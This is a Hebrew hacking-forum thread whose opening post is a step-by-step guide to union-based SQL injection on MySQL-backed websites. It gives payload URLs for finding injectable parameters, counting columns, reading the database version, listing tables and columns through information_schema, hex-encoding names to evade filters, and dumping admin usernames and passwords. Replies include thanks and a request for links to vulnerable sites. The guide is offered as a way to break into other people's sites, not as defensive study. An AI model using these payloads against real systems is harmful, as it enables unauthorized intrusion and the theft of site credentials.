קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [פרסום] מדריך התקפת SQL INJECTION
    על ידי UnioN-ofSite בפורום האקינג ואבטחת מידע
    תגובות: 3
    הודעה אחרונה: 28-05-2011, 18:23
  2. [פרסום] מדריך לBasic SQL Injection
    על ידי Zer0Day בפורום האקינג ואבטחת מידע
    תגובות: 2
    הודעה אחרונה: 30-04-2011, 09:52
  3. [פרסום] מדריך SQL INJECTION של pr0xy !
    על ידי Num32 בפורום האקינג ואבטחת מידע
    תגובות: 4
    הודעה אחרונה: 31-01-2011, 22:15
  4. [בקשה] שתעשו מדריך SQL INJECTION למסד MSSQL
    על ידי Reggae-Man בפורום האקינג ואבטחת מידע
    תגובות: 13
    הודעה אחרונה: 17-08-2010, 13:16
  5. [מכירה] מדריך לפריצה לאתרים עם SQL INJECTION | תציעו נק'
    על ידי Reggae-Man בפורום מכירה
    תגובות: 5
    הודעה אחרונה: 16-08-2010, 15:50
+ תגובה לנושא
מציג תוצאות 1 עד 13 מתוך 13

מדריך התקפת sql injection

  1. #1
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל מדריך התקפת sql injection

    שלום לכולם החלטתי ליכתוב מדריך חדש בנושא התקפת sql injection.
    למדריך :

    לדוגמא יש את האתר הבא : www.mysite.com/page.php?id=1
    איך אנחנו נתחיל ליתקוף אותו? על ידי כך שניבדוק אם מיתקבלת שגיאה ובכך זה יאמר לנו אם הדף פריץ.
    איך בודקים אם יש שגיאה? מוסיפים גרש '
    קוד : www.mysite.com/page.php?id=1' (זה יראה הפוך תגרש שמים אחרי ה 1)
    השגיאה אמורה להיראות בסיגנון :
    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/content/61/5481061/html/viewissue.php on line 10

    לאחר שזה הציג בפנינו דף פריץ עלינו לימצוא את מיקום ההזרקה על ידי הפקודה union select
    קוד : http://www.mysite.com/page.php?id=1+...elect+1,2,3,30
    אנחנו ממשיכים מי 3 עד שזה יציג בפנינו פלט שבה נזריק שיאלתות. לדוגמא הציג לנו תפלט 4 שהגענו ל 8.
    קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,4,5,6,7,8
    עכשיו נוציא את הגירסא של המסד על ידי הפקודה version@@
    נכניס בפלט שזה שהראה לנו במיקרה שלנו 4 נשנה בימקום המיספר 4 תפקודה version@@
    קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,@@version,5,6,7,8
    אם אתם תיראו גירסא 4+ אתם תיצטרכו לנחש database..
    עכשיו הסבר אם תיראו גירסא 5+ :
    בגירסא 5+ יש database שניקרא information_schema שם נימצאות כל הטבלאות.
    אחרי שבדקנו תגירסא עלינו כמובן להוציא טבלאות איך אנחנו מוצאים טבלאות? נכניס בפלט 4 את הפקודה group_concat(table_name)
    הסבר : הפקודה group_concat תראה לנו את כל הטבלאות.
    ואחרי 8 נירשום from information_schema.tables
    קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables
    זה יציג בפנינו טבלאות.. נבחר טבלה שאנחנו רוצים לישלוף את הנתונים שלה.. נגיד כמה טבלאות כאלה בטוח יעניינו אותכם :
    admin
    user
    admins
    users
    admin_user
    login
    adminuser
    ועוד כאלה בסיגנון..
    נגיד ומצאנו טבלה כזאת : admin ניבדוק את העמודות שלה.. על ידי שנכניס בפלט 4:
    group_concat(column_name) אחרי המיספר 8 from information_schema.tables+where+table_name='admin'
    קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,group_concat(column_name),5,6,7,8+from+informat ion_schema.columns+where+table_name='admin'
    יש אתרים שחוסמים תווים אז ניצטרך להמיר את admin ב hex
    תיכנסו לאתר הזה : http://www.dolcevie.com/js/converter.html
    תירשמו ב Ascii :
    admin ואז תילחצו על ASCII To Hex אתם תיראו 61:64:6d:69:6e תורידו את הנקודותים להכל
    תוסיפו 0x שזה יראה, כך 0x61646d696e עכשיו נשנה את ההזרקה
    קוד : www.mysite.com/page.php?id=1+union+select+1.2.3.group_concat(column_name),5,6,7,8+from+informat ion_schema.columns+where+table_name=
    0x61646d696e
    נגיד וזה הציג בפנינו עמודות כאלה :
    username
    pass
    עכשיו נישלוף את הנתונים של העמודות username,pass איך שולפים? נכניס בפלט 4 group_concat(username,0x3a,pass) אחרי 8 from admin
    הסבר: 0x3a עושה נקודותים לדוגמא yoram:123
    קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,group_concat(username,0x3a,pass),5,6,7,8 from admin
    הנתונים שזה הציג בפנינו (דוגמא) :
    amit122:2224456
    שלב אחרון כמובן? מציאת פאנל ניהול.
    אני מקווה שזה עזר לכם במשהו..
    קרדיט ל..לי^^


  2. קישורים ממומנים

  3. #2
    מורחקים
    שם פרטי
    sansu
    תאריך הצטרפות
    08/2010
    גיל
    33
    הודעות
    402
    לייקים
    1
    נקודות
    9
    משפט מחץ
    דוחף לדוחיפת
    מין: זכר

    ברירת מחדל

    לא הבנתי כלום .. אבל עדיין תודה !

  4. #3
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    טוב אז בבקשה..

  5. #4
    מורחקים
    שם פרטי
    סבטלנ
    תאריך הצטרפות
    07/2010
    גיל
    33
    הודעות
    56
    לייקים
    0
    נקודות
    0
    משפט מחץ
    עולם סגול רואים דרך בוקס בעין :)
    מין: נקבה

    ברירת מחדל

    תודה!

    נניח שאני מוסיף גרש ובמקום השגיאה בSQL פשוט הדף משתמש (מוצג מחדש בלי תוכן או נדפק איכשהוא) הבנתי שזה עדיין אומר שיש פריצה לא?

  6. #5
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי facebook1 צפיה בהודעה
    תודה!

    נניח שאני מוסיף גרש ובמקום השגיאה בSQL פשוט הדף משתמש (מוצג מחדש בלי תוכן או נדפק איכשהוא) הבנתי שזה עדיין אומר שיש פריצה לא?
    לפעמים

  7. #6
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    כן בדרך כלל..

  8. #7
    מורחקים
    תאריך הצטרפות
    08/2010
    הודעות
    216
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    אני חייב להדגיש משהו המסד הוא MySQL כך שמדריך זה לא תקף ל MSSQL או ACCESS

  9. #8
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    ברור..

  10. #9
    משתמש מתחיל
    שם פרטי
    Ben
    תאריך הצטרפות
    11/2010
    גיל
    35
    הודעות
    27
    לייקים
    0
    נקודות
    0
    משפט מחץ
    Bananasplit
    מין: זכר

    ברירת מחדל

    אפשר לפרוץ פורומים דרך הדבר הזה? כי ניסיתי ולא הצלחתי.. אין שום שגיאה.

  11. #10
    משתמש כבוד האוואטר של ArieI
    תאריך הצטרפות
    05/2009
    גיל
    30
    הודעות
    5,151
    לייקים
    463
    נקודות
    934
    מין: זכר

    ברירת מחדל

    למה אתה מקפיץ ?


  12. #11
    משתמש מתחיל
    תאריך הצטרפות
    01/2012
    הודעות
    155
    לייקים
    2
    נקודות
    0
    משפט מחץ
    נשים רבות מחכות לאביר על סוס לבן… ועולות על כל חמור שעובר בדרך…
    מין: זכר

    ברירת מחדל

    אחלה מדריך באמת ראיתי כבר כמה מדריכים אבל זה מפורט ומוסבר בצורה מצוינת,תודה רבה.
    נערך לאחרונה על ידי yakov111160; 29-01-2012 בשעה 03:06.

  13. #12
    משתמש מתחיל
    תאריך הצטרפות
    01/2012
    הודעות
    155
    לייקים
    2
    נקודות
    0
    משפט מחץ
    נשים רבות מחכות לאביר על סוס לבן… ועולות על כל חמור שעובר בדרך…
    מין: זכר

    ברירת מחדל

    תן קישורים לאתרים פריצים

  14. #13
    משתמש מתחיל
    תאריך הצטרפות
    01/2012
    גיל
    36
    הודעות
    24
    לייקים
    1
    נקודות
    0
    מין: זכר

    ברירת מחדל

    נחמד , הבעיה שזה לא שווה כלום.
    האתרים שאתה יכול לפרוץ עם השיטה הזאת אתה לא מעוניין בהם , ובאתרים שאתה מעוניין אתה לא יכול לפרוץ עם השיטה הזאת.

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 21:40.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,472,817 | הודעות: 8,173,404 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect